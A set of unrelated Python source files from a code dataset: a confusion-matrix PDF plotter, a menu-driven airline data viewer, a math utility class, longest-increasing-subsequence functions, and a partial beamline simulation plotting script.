ctx.move_to(0, h)\n ctx.show_text(self.strings[0])\n\n w = ctx.text_extents(self.strings[1])[4]\n x2c = matrix_left + 0.5 * matrix_size\n ctx.move_to(x2c - w / 2.0, h)\n ctx.show_text(self.strings[1])\n\n w = ctx.text_extents(self.strings[2])[4]\n ctx.move_to(figure_width - w, h)\n ctx.show_text(self.strings[2])\n\n ctx.stroke()\n\n\nclass Subheader(object):\n def __init__(self, codes):\n self.codes = codes\n\n def set_font(self, ctx):\n small_font(ctx)\n\n def height(self, ctx):\n ctx.save()\n self.set_font(ctx)\n h = max([ctx.text_extents(s)[3] for s in self.codes])\n ctx.restore()\n return h + 5\n\n def draw(self, ctx, matrix_left, matrix_width):\n self.set_font(ctx)\n h = self.height(ctx) - 5\n tile_size = matrix_width / len(self.codes)\n for i, code in enumerate(self.codes):\n w = ctx.text_extents(code)[3]\n ctx.move_to(matrix_left + (i + 0.5) * tile_size + w / 2.0, h + 3) # - w / 2.0, h)\n ctx.save()\n ctx.rotate(3 * 3.14/2.0)\n ctx.show_text(code)\n ctx.restore()\n ctx.stroke()\n\nclass Body(object):\n def __init__(self, figure_width, labels, cm, formatter=None):\n self.figure_width = figure_width\n self.labels = labels\n self.cm = cm\n self.accuracies = ['%.0f %%' % (cm[i,i] * 100.0 / cm[i,:].sum())\n for i in range(len(self.labels))]\n if formatter is None:\n self.formatter = lambda i, j: cm[i, j]\n else:\n self.formatter = formatter\n\n def set_font(self, ctx):\n normal_font(ctx)\n\n def set_inner_font(self, ctx):\n small_font(ctx)\n\n def 
code_left(self, ctx):\n self.set_font(ctx)\n class_width = max([ctx.text_extents(s)[4] for s, code in self.labels])\n return class_width + 5\n\n def matrix_left(self, ctx):\n self.set_font(ctx)\n code_width = max([ctx.text_extents(code)[4] for s, code in self.labels])\n return self.code_left(ctx) + code_width + 5\n\n def matrix_size(self, ctx):\n ctx.save()\n normal_font(ctx)\n acc_width = ctx.text_extents('100 %')[4]\n matrix_size = self.figure_width - self.matrix_left(ctx) - acc_width - 5\n ctx.restore()\n return matrix_size\n\n def matrix_width(self, ctx):\n return self.matrix_size(ctx)\n\n def height(self, ctx):\n return self.matrix_size(ctx) + 5\n\n def draw(self, ctx):\n lw = 0.5\n inner_size = self.matrix_size(ctx) - 2 * lw\n ctx.set_source_rgb(0, 0, 0)\n ctx.set_line_width(lw)\n ml = self.matrix_left(ctx)\n ctx.rectangle(ml + lw, lw, inner_size, inner_size)\n ctx.stroke()\n n = len(self.labels)\n tile_size = inner_size / n\n self.set_inner_font(ctx)\n for i in range(n):\n for j in range(n):\n ctx.rectangle(ml + lw + j * tile_size, lw + i * tile_size,\n tile_size, tile_size)\n ctx.set_source_rgba(1, 0, 0, self.cm[i, j] * 0.8 / self.cm[i,:].sum())\n ctx.fill()\n # Number inside\n ctx.set_source_rgba(0, 0, 0)\n if self.cm.dtype.kind == 'f':\n if self.cm[i, j] < 0.5:\n s = ''\n #elif self.cm[i, j] < 0.95:\n # s = '.%d' % round(self.cm[i, j] * 10.0)\n else:\n s = '%d' % round(self.cm[i, j])\n elif self.cm.dtype.kind == 'i':\n if self.cm[i, j] == 0:\n s = ''\n else:\n s = '%d' % self.cm[i, j]\n else:\n s = str(self.cm[i, k])\n h, w = ctx.text_extents(s)[3:5]\n ctx.move_to(ml + lw + (j + 0.5) * tile_size - 0.5 * w,\n lw + (i + 0.5) * tile_size + 0.5 * h)\n ctx.show_text(s)\n ctx.stroke()\n\n ctx.set_source_rgb(0, 0, 0) # black\n\n self.set_font(ctx)\n cl = self.code_left(ctx)\n for i, (s, code) in enumerate(self.labels):\n h = ctx.text_extents(s)[3]\n y = (i + 0.5) * tile_size + h / 2.0\n ctx.move_to(0, y)\n ctx.show_text(s)\n ctx.move_to(cl, y)\n ctx.show_text(code)\n\n for i, acc in enumerate(self.accuracies):\n h, w = ctx.text_extents(acc)[3:5]\n y = (i + 0.5) * tile_size + h / 2.0\n ctx.move_to(self.figure_width - w, y)\n ctx.show_text(acc)\n ctx.stroke()\n\n\nclass Footer(object):\n def __init__(self, figure_width, cm):\n self.figure_width = figure_width\n self.cm = cm\n self.ncorrect = sum(self.cm[i,i] for i in range(self.cm.shape[0]))\n self.ntotal = self.cm.sum()\n\n def left_font(self, ctx):\n normal_font(ctx)\n\n def left_text(self):\n if self.cm.dtype.kind == 'f':\n return 'Overall accuracy: '\n else:\n return 'Overall accuracy: %d / %d = ' % (self.ncorrect, self.ntotal)\n\n def right_font(self, ctx):\n bold_font(ctx)\n\n def right_text(self):\n return '%.0f %%' % (self.ncorrect * 100.0 / self.ntotal)\n\n def height(self, ctx):\n ctx.save()\n self.left_font(ctx)\n h1 = ctx.text_extents(self.left_text())[3]\n self.right_font(ctx)\n h2 = ctx.text_extents(self.right_text())[3]\n ctx.restore()\n return max(h1, h2)\n\n def draw(self, ctx):\n y = self.height(ctx) - 3\n\n self.right_font(ctx)\n s = self.right_text()\n wr = ctx.text_extents(s)[4]\n ctx.move_to(self.figure_width - wr, y)\n ctx.show_text(s)\n\n self.left_font(ctx)\n s = self.left_text()\n wl = ctx.text_extents(s)[4]\n ctx.move_to(self.figure_width - wr - wl, y)\n ctx.show_text(s)\n\n ctx.stroke()\n\n\nclass Figure(object):\n def __init__(self, figure_width, labels, cm, title=None):\n self.figure_width = figure_width\n self.title = Title(title)\n self.header = Header()\n codes = [code for s, code in labels]\n 
self.subheader = Subheader(codes)\n self.body = Body(figure_width, labels, cm)\n self.footer = Footer(figure_width, cm)\n\n def height(self, ctx):\n return (self.title.height(ctx) + self.header.height(ctx) +\n self.subheader.height(ctx) +\n self.body.height(ctx) + self.footer.height(ctx))\n\n def draw(self, ctx):\n matrix_left = self.body.matrix_left(ctx)\n matrix_size = self.body.matrix_size(ctx)\n self.title.draw(ctx)\n ctx.translate(0, self.title.height(ctx))\n self.header.draw(ctx, matrix_left, matrix_size, self.figure_width)\n ctx.translate(0, self.header.height(ctx))\n self.subheader.draw(ctx, matrix_left, matrix_size)\n ctx.translate(0, self.subheader.height(ctx))\n self.body.draw(ctx)\n ctx.translate(0, self.body.height(ctx))\n self.footer.draw(ctx)\n\nclass Page(object):\n def __init__(self, figure, margin=0):\n self.figure = figure\n self.margin = margin\n\n def height(self, ctx):\n return self.figure.height(ctx) + 2 * self.margin\n\n def draw(self, ctx):\n ctx.save()\n ctx.translate(margin, margin)\n self.figure.draw(ctx)\n ctx.restore()\n\n\ncode_map = dict([('Actin disruptors', 'Act'),\n ('Aurora kinase inhibitors', 'Aur'),\n ('Cholesterol-lowering', 'Ch'),\n ('DNA damage', 'DD'),\n ('DNA replication', 'DR'),\n ('Epithelial', 'Epi'),\n ('Kinase inhibitors', 'KI'),\n ('Monoaster', 'MA'),\n ('Eg5 inhibitors', 'Eg5'),\n ('Microtubule stabilizers', 'MS'),\n ('Microtubule destabilizers', 'MD'),\n ('Protein degradation', 'PD'),\n ('Protein synthesis', 'PS'),\n # Loo et al.\n ('Actin', 'Act'),\n ('Calcium regulation', 'Ca'),\n ('Cholesterol', 'Cho'),\n ('Cyclooxygenase', 'Cyc'),\n ('Energy metabolism', 'En'),\n ('Histone deacetylase', 'HD'),\n ('Kinase', 'Kin'),\n ('Microtubule', 'MT'),\n ('Neurotransmitter', 'Ne'),\n ('Nuclear receptor', 'Nu'),\n ('Topoisomerase', 'Topo'),\n ('Vesicle trafficing', 'Ves'),\n ('Metal homeostasis', 'MH')])\n\nparser = OptionParser(\"usage: %prog [-f] [-t TITLE] INPUT-FILE OUTPUT-FILE\")\nparser.add_option('-f', dest='float', action='store_true', help='use floating-point accuracies')\nparser.add_option('-t', dest='title', help='title')\noptions, args = parser.parse_args()\nif len(args) != 2:\n parser.error('Incorrect number of arguments')\ninput_filename, output_filename = args\n\nconfusion = load_confusion(input_filename)\ncm = confusion_matrix(confusion, 'if'[options.float or 0])\nlabels = [(l, code_map.get(l, l))\n for l in sorted(set(a for a, b in confusion.keys()))]\n\nfigure_width = 3.44 * 72\nfigure = Figure(figure_width, labels, cm, options.title)\nmargin = 0\npage = Page(figure, margin)\n\nsurface_width = figure_width + 2 * margin\nsurface_height = 675.36 + 2 * margin\nsurface = cairo.PDFSurface(output_filename, surface_width, surface_height)\nctx = cairo.Context(surface)\nsurface.set_size(surface_width, page.height(ctx))\npage.draw(ctx)\nsurface.show_page()\nsurface.finish()\n","repo_name":"carpenterlab/2016_Pawlowski_MLCB","sub_path":"code/evaluation/pretty-confusion-matrix.py","file_name":"pretty-confusion-matrix.py","file_ext":"py","file_size_in_byte":11440,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"30543835700","text":"import UIAPI\nimport datetime\n\ndef printObjects(name):\n if type(name) == str:\n print(name)\n elif type(name) != list:\n print(\"\")\n print(name)\n print(\"\")\n else:\n for count, theObject in enumerate(name):\n if len(name) > 4:\n if count >= 4:\n if count % 4 == 0:\n printNext = input(\"\\nPress enter to see next (q to quit):\")\n printNext = 
printNext.lower()\n if printNext == \"q\":\n return None\n print(\"\")\n print(theObject)\n print(\"\")\n\ndef makeDateFromInput():\n day, month, year = None, None, None\n dateInput = \"\"\n dateOutput = \"\"\n while True:\n dateInput = input(\" - Input date(f.x. 24/12/2019), b for back: \")\n if dateInput == \"b\":\n dateOutput = \"b\"\n break\n else:\n try:\n day, month, year = map(int, dateInput.split('/'))\n dateOutput = datetime.datetime(year, month, day)\n break\n except Exception:\n print(\"Wrong input, try again!\")\n return dateOutput\n\nclass View():\n def __init__(self):\n self.uiapi = UIAPI.UIAPI()\n\n def viewMenu(self):\n print('''View Data\n--------------------------------------------\n 1. View Worker\n 2. View Airplane\n 3. View Flight routes\n 4. View Voyages\n 5. View Flight\n--------------------------------------------''')\n\n viewMenuInput = input(\"Input choice (q to Quit, b for back): \")\n viewMenuInput = viewMenuInput.lower()\n if viewMenuInput == \"1\":\n viewWorkerOutput = View.viewWorker(self)\n if viewWorkerOutput == \"b\":\n viewMenuInput = View.viewMenu(self)\n elif viewMenuInput == \"2\":\n viewAirplaneOutput = View.viewAirplane(self)\n if viewAirplaneOutput == \"b\":\n viewMenuInput = View.viewMenu(self)\n elif viewMenuInput == \"3\":\n viewFlightRoutesOutput = View.viewFlightRoutes(self)\n if viewFlightRoutesOutput == \"b\":\n viewMenuInput = View.viewMenu(self)\n elif viewMenuInput == \"4\":\n viewVoyagesOutput = View.viewVoyages(self)\n if viewVoyagesOutput == \"b\":\n viewMenuInput = View.viewMenu(self)\n elif viewMenuInput == \"5\":\n viewFlightOutput = View.viewFlight(self)\n if viewFlightOutput == \"b\":\n viewMenuInput = View.viewMenu(self)\n elif viewMenuInput == \"b\":\n return viewMenuInput\n elif viewMenuInput == \"q\":\n return viewMenuInput\n else:\n print(\"Wrong input, try again!\")\n viewMenuInput = View.viewMenu(self)\n return viewMenuInput\n\n def viewWorker(self): \n print('''1. View Worker\n--------------------------------------------\n 1. View Pilots\n 2. View Attendants\n 3. View Managers\n 4. View All Staff\n--------------------------------------------''')\n\n viewWorkerInput = input(\"Input choice (q to Quit, b for back): \")\n viewWorkerInput = viewWorkerInput.lower()\n if viewWorkerInput == \"1\":\n viewPilotsOutput = View.viewPilots(self)\n if viewPilotsOutput == \"b\":\n viewWorkerInput = View.viewWorker(self)\n elif viewPilotsOutput == \"q\":\n return viewWorkerInput\n else:\n viewWorkerInput = View.viewWorker(self)\n elif viewWorkerInput == \"2\":\n viewAttendantsOutput = View.viewAttendants(self)\n if viewWorkerInput == \"b\":\n viewWorkerInput = View.viewWorker(self)\n elif viewAttendantsOutput == \"q\":\n return viewWorkerInput\n else:\n viewWorkerInput = View.viewWorker(self)\n elif viewWorkerInput == \"3\":\n viewManagersInput = View.viewManagers(self)\n if viewManagersInput == \"b\":\n viewWorkerInput = View.viewWorker(self)\n elif viewManagersInput == \"q\":\n return viewWorkerInput\n viewWorkerInput = View.viewWorker(self)\n elif viewWorkerInput == \"4\":\n allStaff = UIAPI.UIAPI.viewAllWorkers(self)\n printObjects(allStaff)\n viewWorkerInput = View.viewWorker(self)\n elif viewWorkerInput == \"b\":\n return viewWorkerInput\n elif viewWorkerInput == \"q\":\n return viewWorkerInput\n else:\n print(\"Wrong input, try again\")\n viewWorkerInput = View.viewWorker(self)\n return viewWorkerInput\n\n # Pilots\n def viewPilots(self):\n print('''1.1. View Pilots\n--------------------------------------------\n 1. 
View specific pilot\n 2. View all pilots\n 3. View all pilots who are not working on \n specific date\n 4. View all pilots who are working on \n specific date\n 5. View all voyages of a pilot in a given \n week\n 6. View all Pilots with certain \n plane license\n--------------------------------------------''')\n viewPilotsInput = input(\" - Input choice (q to Quit, b for back): \")\n viewPilotsInput = viewPilotsInput.lower()\n if viewPilotsInput == \"1\":\n pilotSSN = input(\"Input SSN with no spaces in between: \")\n pilot = UIAPI.UIAPI.viewWorkerBySSn(self, pilotSSN, \"Pilot\")\n printObjects(pilot)\n return viewPilotsInput\n elif viewPilotsInput == \"2\":\n allPilots = UIAPI.UIAPI.viewWorkerByPOS(self, \"Pilot\")\n printObjects(allPilots)\n return viewPilotsInput\n elif viewPilotsInput == \"3\":\n viewPilotNotDate = makeDateFromInput()\n if viewPilotNotDate != \"b\":\n availablePilots = UIAPI.UIAPI.listWorkersbydate(self, viewPilotNotDate, \"Pilot\", \"Available\")\n printObjects(availablePilots)\n return viewPilotsInput\n elif viewPilotsInput == \"4\":\n viewPilotDate = makeDateFromInput()\n if viewPilotDate != \"b\":\n unavailablePilots = UIAPI.UIAPI.listWorkersbydate(self, viewPilotDate, \"Pilot\", \"Unavailable\")\n printObjects(unavailablePilots)\n return viewPilotsInput\n elif viewPilotsInput == \"5\":\n while True:\n pilotSSN = input(\" - Input SSN with no spaces in between, b for back: \")\n if pilotSSN == \"b\":\n return viewPilotsInput\n pilotYear = input(\" - Input year, b for back: \")\n if pilotYear == \"b\":\n return viewPilotsInput\n pilotWeek = input(\" - Input week of the year, b for back: \")\n if pilotWeek == \"b\":\n return viewPilotsInput\n pilotWeeklyVoyages = UIAPI.UIAPI.viewallVoyagesInWeek(self, pilotSSN, pilotYear, pilotWeek, \"Pilot\")\n printObjects(pilotWeeklyVoyages)\n return viewPilotsInput\n elif viewPilotsInput == \"6\":\n pilotLicence = input(\" - Input Plane Licence: \")\n planePilots = UIAPI.UIAPI.viewWorkersByPlaneLicence(self, pilotLicence)\n printObjects(planePilots)\n elif viewPilotsInput == \"b\":\n return viewPilotsInput\n elif viewPilotsInput == \"q\":\n return viewPilotsInput\n else:\n print(\"Wrong input, try again\")\n viewPilotsInput = View.viewPilots(self)\n #return viewPilotsInput\n return viewPilotsInput\n\n def viewAttendants(self):\n print('''1.2. View Attendants\n--------------------------------------------\n 1. View specific attendant\n 2. View all attendants\n 3. View all attendants who are not working on \n specific date\n 4. View all attendants who are working on \n specific date\n 5. 
View all voyages of an attendant in a given \n week\n--------------------------------------------''')\n viewAttendantsInput = input(\"Input choice (q to Quit, b for back): \")\n viewAttendantsInput = viewAttendantsInput.lower()\n if viewAttendantsInput == \"1\":\n attendantSSN = input(\" - Input SSN with no spaces in between: \")\n Attendant = UIAPI.UIAPI.viewWorkerBySSn(self, attendantSSN, \"Attendant\")\n printObjects(Attendant)\n return viewAttendantsInput\n elif viewAttendantsInput == \"2\":\n allAttendants = UIAPI.UIAPI.viewWorkerByPOS(self, \"Attendant\")\n printObjects(allAttendants)\n return viewAttendantsInput\n elif viewAttendantsInput == \"3\":\n viewAttendantNotDate = makeDateFromInput()\n if viewAttendantNotDate != \"b\":\n availableAttendants = UIAPI.UIAPI.listWorkersbydate(self, viewAttendantNotDate, \"Attendant\", \"Available\")\n printObjects(availableAttendants)\n return viewAttendantsInput\n elif viewAttendantsInput == \"4\":\n viewAttendantDate = makeDateFromInput()\n if viewAttendantDate != \"b\":\n unavailableAttendants = UIAPI.UIAPI.listWorkersbydate(self, viewAttendantDate, \"Attendant\", \"Unavailable\")\n printObjects(unavailableAttendants)\n return viewAttendantsInput\n elif viewAttendantsInput == \"5\":\n attendantSSN = input(\" - Input SSN with no spaces in between: \")\n attendantYear = input(\" - Input year: \")\n attendantWeek = input(\" - Input week of the year: \")\n attendantWeeklyVoyages = UIAPI.UIAPI.viewallVoyagesInWeek(self, attendantSSN, attendantYear, attendantWeek, \"Attendant\")\n printObjects(attendantWeeklyVoyages)\n return viewAttendantsInput\n elif viewAttendantsInput == \"b\":\n return viewAttendantsInput\n elif viewAttendantsInput == \"q\":\n return viewAttendantsInput\n else:\n print(\"Wrong input, try again!\")\n viewAttendantsInput = View.viewAttendants(self)\n return viewAttendantsInput\n\n def viewManagers(self):\n print('''1.2. View Managers\n--------------------------------------------\n 1. View specific manager\n 2. View all managers\n--------------------------------------------''')\n viewManagersInput = input(\"Input choice (q to Quit, b for Back): \")\n viewManagersInput = viewManagersInput.lower()\n if viewManagersInput == \"1\":\n managerSSN = input(\" - Input SSN with no spaces in between: \")\n Manager = UIAPI.UIAPI.viewWorkerBySSn(self, managerSSN, \"Manager\")\n printObjects(Manager)\n return viewManagersInput\n elif viewManagersInput == \"2\":\n allManagers = UIAPI.UIAPI.viewWorkerByPOS(self, \"Manager\")\n printObjects(allManagers)\n return viewManagersInput\n elif viewManagersInput == \"b\":\n return viewManagersInput\n elif viewManagersInput == \"q\":\n return viewManagersInput\n else:\n print(\"Wrong input, try again!\")\n viewManagersInput = View.viewManagers(self)\n return viewManagersInput\n\n def viewAirplane(self):\n print('''2. View Airplane\n--------------------------------------------\n 1. View specific airplane\n 2. 
View all airplanes\n--------------------------------------------''')\n\n viewAirplaneInput = input(\"Input choice (q to Quit, b for Back): \")\n viewAirplaneInput = viewAirplaneInput.lower()\n if viewAirplaneInput == \"1\":\n AirplaneReg = input(\" - Input airplane registration: \")\n Airplane = UIAPI.UIAPI.viewCertainAirplane(self, AirplaneReg) \n printObjects(Airplane)\n viewAirplaneInput = View.viewAirplane(self)\n elif viewAirplaneInput == \"2\":\n allPlanes = UIAPI.UIAPI.viewAllAirplanes(self)\n printObjects(allPlanes)\n viewAirplaneInput = View.viewAirplane(self)\n elif viewAirplaneInput == \"b\":\n return viewAirplaneInput\n elif viewAirplaneInput == \"q\":\n return viewAirplaneInput\n else:\n print(\"Wrong input, try again!\")\n viewAirplaneInput = View.viewAirplane(self)\n return viewAirplaneInput\n \t\n def viewFlightRoutes(self):\n print('''3. View Flight Routes\n--------------------------------------------\n 1. View specific route\n 2. View all flight routes\n--------------------------------------------''')\n\n viewFlightRoutesInput = input(\"Input choice (q to Quit, b for Back): \")\n viewFlightRoutesInput = viewFlightRoutesInput.lower()\n if viewFlightRoutesInput == \"1\":\n flightRouteID = input(\" - Input Flight Route ID: \")\n flightRoute = UIAPI.UIAPI.viewFlightRoute(self, flightRouteID)\n printObjects(flightRoute)\n viewFlightRoutesInput = View.viewFlightRoutes(self)\n elif viewFlightRoutesInput == \"2\":\n allFlightRoutes = UIAPI.UIAPI.viewAllFlightRoutes(self)\n printObjects(allFlightRoutes)\n viewFlightRoutesInput = View.viewFlightRoutes(self)\n elif viewFlightRoutesInput == \"b\":\n return viewFlightRoutesInput\n elif viewFlightRoutesInput == \"q\":\n return viewFlightRoutesInput\n else:\n print(\"Wrong input, try again!\")\n viewFlightRoutesInput = View.viewFlightRoutes(self)\n return viewFlightRoutesInput\n\n def viewVoyages(self):\n print('''4. View Voyages\n--------------------------------------------\n 1. View a specific voyage\n 2. View all voyages\n 3. View all voyages on a given day\n 4. View all voyages in a given week\n--------------------------------------------''')\n\n viewVoyagesInput = input(\"Input choice (q to Quit, b for Back): \")\n viewVoyagesInput = viewVoyagesInput.lower()\n if viewVoyagesInput == \"1\":\n voyageID = input(\" - Input Voyage ID: \")\n voyage = UIAPI.UIAPI.viewVoyage(self, voyageID)\n printObjects(voyage)\n viewVoyagesInput = View.viewVoyages(self)\n elif viewVoyagesInput == \"2\":\n voyages = UIAPI.UIAPI.viewallVoyages(self)\n printObjects(voyages)\n viewVoyagesInput = View.viewVoyages(self)\n elif viewVoyagesInput == \"3\":\n voyageDate = makeDateFromInput()\n if voyageDate != \"b\":\n allVoyagesDay = UIAPI.UIAPI.viewallVoyagesDay(self, voyageDate)\n printObjects(allVoyagesDay)\n viewVoyagesInput = View.viewVoyages(self)\n elif viewVoyagesInput == \"4\":\n voyageYear = input(\" - Input year: \")\n voyagetWeek = input(\" - Input week of the year: \")\n allVoyagesWeek = UIAPI.UIAPI.viewallVoyagesWeek(self, voyageYear, voyagetWeek)\n printObjects(allVoyagesWeek)\n viewVoyagesInput = View.viewVoyages(self)\n elif viewVoyagesInput == \"b\":\n return viewVoyagesInput\n elif viewVoyagesInput == \"q\":\n return viewVoyagesInput\n else:\n print(\"Wrong input, try again!\")\n viewVoyagesInput = View.viewVoyages(self)\n return viewVoyagesInput\n\n def viewFlight(self):\n print('''5. View Flights\n--------------------------------------------\n 1. View specific flight\n 2. View all flights\n 3. View active flights\n 4. 
View cancelled/landed flights\n--------------------------------------------''')\n\n viewFlightInput = input(\"Input choice (q to Quit, b for Back): \")\n viewFlightInput = viewFlightInput.lower()\n if viewFlightInput == \"1\":\n flightNumber = input(\" - Input flight number: \")\n flightDate = makeDateFromInput()\n if flightDate != \"b\":\n viewFlight = UIAPI.UIAPI.viewCertainFlight(self, flightNumber, flightDate)\n printObjects(viewFlight)\n viewFlightInput = View.viewFlight(self)\n if viewFlightInput == \"2\":\n allFlights = UIAPI.UIAPI.viewAllFlights(self)\n printObjects(allFlights)\n viewFlightInput = View.viewFlight(self)\n if viewFlightInput == \"3\":\n viewActiveFlights = UIAPI.UIAPI.viewFlightsByStatuses(self, [\"On schedule\", \"Loading\", \"In-Air\"])\n printObjects(viewActiveFlights)\n viewFlightInput = View.viewFlight(self)\n if viewFlightInput == \"4\":\n viewCancelledFlights = UIAPI.UIAPI.viewFlightsByStatuses(self, [\"Landed\", \"Cancelled\"])\n printObjects(viewCancelledFlights)\n viewFlightInput = View.viewFlight(self)\n elif viewFlightInput == \"b\":\n return viewFlightInput\n elif viewFlightInput == \"q\":\n return viewFlightInput\n else:\n print(\"Wrong input, try again!\")\n viewFlightInput = View.viewFlight(self)\n return viewFlightInput\n","repo_name":"TheRobertSnow/HR_Dropouts","sub_path":"NaN_Air/UI_layer/View.py","file_name":"View.py","file_ext":"py","file_size_in_byte":16877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36970797152","text":"#!/usr/bin/python3\n# file name: math.py\n# author: codepasser\n# date: 2022/9/6\nfrom decimal import Decimal\nfrom typing import List\n\nimport numpy as np\n\n\nclass Math:\n __scale: str = None\n\n def __init__(self, scale: str = '0.0000'):\n self.__scale = scale\n\n def fixed(self, _item: float) -> float:\n \"\"\"\n 保留有效数字\n :param _item: 值\n :return: 结果\n \"\"\"\n return float(Decimal('%16f' % _item).quantize(Decimal(self.__scale)))\n\n def fixed_multi(self, _items: List[float]) -> List[float]:\n \"\"\"\n 保留有效数字(数组全部元素)\n :param _items: 值-数组\n :return: 结果-数组\n \"\"\"\n _result: List[float] = []\n for i in range(len(_items)):\n _fixed = self.fixed(_items[i])\n _result.append(_fixed)\n return _result\n\n def is_integer(self, _val) -> bool:\n \"\"\"\n 是否为整数值\n :param _val: 值\n :return: 结果\n \"\"\"\n _val = Decimal('%16f' % _val).quantize(Decimal(self.__scale))\n _count_dot = str(_val).count('.')\n if _count_dot == 0:\n return True\n _s_val = str(_val).split('.')\n if len(_s_val) == 1:\n return True\n if len(_s_val) == 2 and _s_val[1] == '0000':\n return True\n else:\n return False\n\n @staticmethod\n def computed_ln(_items: List[float]) -> List[float]:\n \"\"\"\n 注意点:若样本中含有0或负数无需取ln值\n 保留有效数字(数组全部元素)并计算数组数据的ln值\n :param _items: 值-数组\n :return: 结果-数组\n \"\"\"\n _result: List[float] = []\n for i in range(len(_items)):\n _ln_result = np.log(_items[i])\n _result.append(_ln_result)\n return _result\n\n @staticmethod\n def computed_ln_current(_item: float) -> float:\n \"\"\"\n 注意点:若样本中含有0或负数无需取ln值\n 计算当前数据的ln值\n :param _item: 值-当前值\n :return: 结果-当前值取对数\n \"\"\"\n return np.log(_item)\n\n @staticmethod\n def is_computed_ln(_items: List[float]) -> bool:\n \"\"\"\n 直接获取列表最小数值 判断其是否 > 0\n :param _items: 值-数组\n :return: 结果-最小值是否是正数\n \"\"\"\n return min(_items) > 0 if _items else False\n\n @staticmethod\n def sub_abs(_items: List[float], _field_avg: float) -> List[float]:\n \"\"\"\n 综合指标:\n i.以50%为界限,所有数据减去50%,再取绝对值,做标准正态,越小越好;\n 
ii.以行业平均为界限,分行业取平均值,所有数据减去所在行业的平均值,再取绝对值,做标准正态,越小越好;\n :param _items: 值-数组\n :param _field_avg: 值-所在行业平均值\n :return: 结果-数组\n \"\"\"\n _result: List[float] = []\n for i in range(len(_items)):\n _sub_result = abs(_items[i] - _field_avg)\n _result.append(_sub_result)\n return _result\n\n @staticmethod\n def sub_abs_current(_item: float, _field_avg: float) -> float:\n \"\"\"\n 综合指标:\n i.以50%为界限,所有数据减去50%,再取绝对值,做标准正态,越小越好;\n ii.以行业平均为界限,分行业取平均值,所有数据减去所在行业的平均值,再取绝对值,做标准正态,越小越好;\n :param _item: 值-当前值\n :param _field_avg: 值-所在行业平均值\n :return: 结果-当前值取减平均值 取对数\n \"\"\"\n return abs(_item - _field_avg)\n","repo_name":"codepasser-source/01_technology_0010_python","sub_path":"source/esign-pipline/src/common/utils/math.py","file_name":"math.py","file_ext":"py","file_size_in_byte":3760,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34056295057","text":"\"\"\"\nLongest Increasing Subsequence problem on strings\n\"\"\"\n\ndef recursive_LIS_helper(X, i):\n if i == 0:\n return 1\n \n # recursively call only on previous characters that would from an IS\n smaller_precedessors = [j for j in range(i) if X[j] < X[i]]\n \n if len(smaller_precedessors) == 0:\n return 1\n else:\n Y = list(map(lambda j: recursive_LIS_helper(X,j), smaller_precedessors))\n return 1 + max(Y)\n\ndef recursive_LIS(X):\n # recursive implementation of longest increasing subsequence\n return max(list(map(lambda i: recursive_LIS_helper(X, i), range(len(X)))))\n\n# the following instance doesn't compute in reasonable time\n# s = \"ABCDEFGHIJKLMNOPQRSTUVZ\"\n# recursive_LSS(s*3)\n\ndef dynamic_LIS(X):\n # dynamic programming implementation of LIS\n n = len(X)\n if n == 1:\n return 1\n V = [1]*n\n \n for i in range(1,n): \n for j in range(i):\n if X[j] < X[i] and V[j]+1 > V[i]:\n V[i] = V[j] + 1\n \n return max(V)","repo_name":"ClemRec/ADM_HW","sub_path":"ADM_HW03/longest_subqsequence.py","file_name":"longest_subqsequence.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31848402309","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nhybrid_source_file=['ray-tracing-on-slit-200um-as-source-in-srw.txt']#hybrid shares the same source file at slit\n\nhybrid_on_slit_file=['ray-tracing-on-slit-5um.txt','ray-tracing-on-slit-10um.txt','ray-tracing-on-slit-50um.txt','ray-tracing-on-slit-100um.txt']\n#hybrid shares the same distribution file at slit\n\nhybrid_slit_smaller_source_file=['hybrid-slit-5um_smaller-source.txt','hybrid-slit-10um_smaller-source.txt','hybrid-slit-50um_smaller-source.txt','hybrid-slit-100um_smaller-source.txt']\n\nhybrid_mirror_smaller_source_file=['hybrid-mirror-5um_smaller-source.txt','hybrid-mirror-10um_smaller-source.txt','hybrid-mirror-50um_smaller-source.txt','hybrid-mirror-100um_smaller-source.txt']\n\nhybrid_mirror_with_error1_smaller_source_file=['hybrid-mirror-5um_smaller-source-with-error1.txt','hybrid-mirror-10um_smaller-source-with-error1.txt','hybrid-mirror-50um_smaller-source-with-error1.txt','hybrid-mirror-100um_smaller-source-with-error1.txt']\n\nlegenddict_hybrid=[r\"5$\\mu$m slit hybrid\",r\"10$\\mu$m slit hybrid\",r\"50$\\mu$m slit hybrid\",r\"100$\\mu$m slit hybrid\"]\n\naxis_config_on_slit=[[-100,100],[0,0.01],[x*0.001 for x in range(0,11)]]\naxis_config_slit=axis_config_on_slit\naxis_config_mirror=[[-0.8,0.8],[0,1],[x*0.1 for x in range(0,11)]]\naxis_config_mirror_error=[[-0.8,0.8],[0,1],[x*0.1 for x in 
range(0,11)]]\n\naxis_config=[axis_config_on_slit,axis_config_slit,axis_config_mirror,axis_config_mirror_error]\n\nhybrid_title=['hybrid on-slit calculation','hybrid slit calculation','hybrid slit & mirror calculation','hybrid slit & mirror(error) calculation']\n\nsampling_step=2\n#to use the sampling setting as configured\n#2 for data from shadow histgrom widget because of double sampling\n#1 for data from 1D wavefront from SRW(&worfy) widgets\n#you can also set it larger to undersample the data\nsimulation_index=3\n#0-on slit; \n#1-slit diffraction; \n#2-focusing by mirror; \n#3-focusing by mirror with error\nfile_gather=[hybrid_on_slit_file,hybrid_slit_smaller_source_file,hybrid_mirror_smaller_source_file,hybrid_mirror_with_error1_smaller_source_file]\n\ndef image_plot(filename):\n with open(filename) as f1:\n lines1 = f1.readlines()\n x = [line.split()[0] for line in lines1]\n y = [line.split()[1] for line in lines1]\n xx=[float(i) for i in x]\n yy=[float(i) for i in y]\n \n xxx=xx[::sampling_step]#shadow widget plot does not double sample\n yyy=yy[::sampling_step]#shadow widget plot does not double sample\n return(xxx,yyy,sum([round(i) for i in yyy]))\n(x_source,y_source,source_sum)=image_plot(hybrid_source_file[0])\nprint(source_sum)\nfor i in range(4):\n (xxx_noerr,yyy1_noerr,yyysum)=image_plot(file_gather[simulation_index][i])\n 